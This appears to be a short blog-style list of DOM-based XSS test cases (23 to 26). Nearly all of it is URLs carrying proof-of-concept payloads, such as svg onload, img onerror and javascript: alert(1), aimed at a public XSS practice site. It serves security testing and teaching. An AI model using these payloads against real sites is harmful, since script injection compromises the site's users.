DOM-based XSS Test Cases

时间:2023-12-20 23:38:20

Case 23 - DOM Injection via URL parameter (by server + client)

https://brutelogic.com.br/dom/dom.php?p=Hello.<svg onload=alert(1)>

https://brutelogic.com.br/dom/dom.php?p=<img src=x onerror=alert(1)>

DOM-based XSS Test Cases

Case 24 - DOM Injection via URL Parameter (Document Sink)

https://brutelogic.com.br/dom/sinks.html?name=KNOXSS'<svg onload=alert(1)>

https://brutelogic.com.br/dom/sinks.html?name=<img src=x onerror=alert(1)>

DOM-based XSS Test Cases

Case 25 - DOM Injection via Open Redirection (Location Sink)

https://brutelogic.com.br/dom/sinks.html?redir=javascript:alert(1)
DOM-based XSS Test Cases

Case 26 - DOM Injection via URL Parameter (Execution Sink)

https://brutelogic.com.br/dom/sinks.html?index='NASDAQ<svg onload=alert(1)>'

https://brutelogic.com.br/dom/sinks.html?index='NASDAQ';alert(1);

DOM-based XSS Test Cases

参考:

https://brutelogic.com.br/knoxss.html

https://xz.aliyun.com/t/4283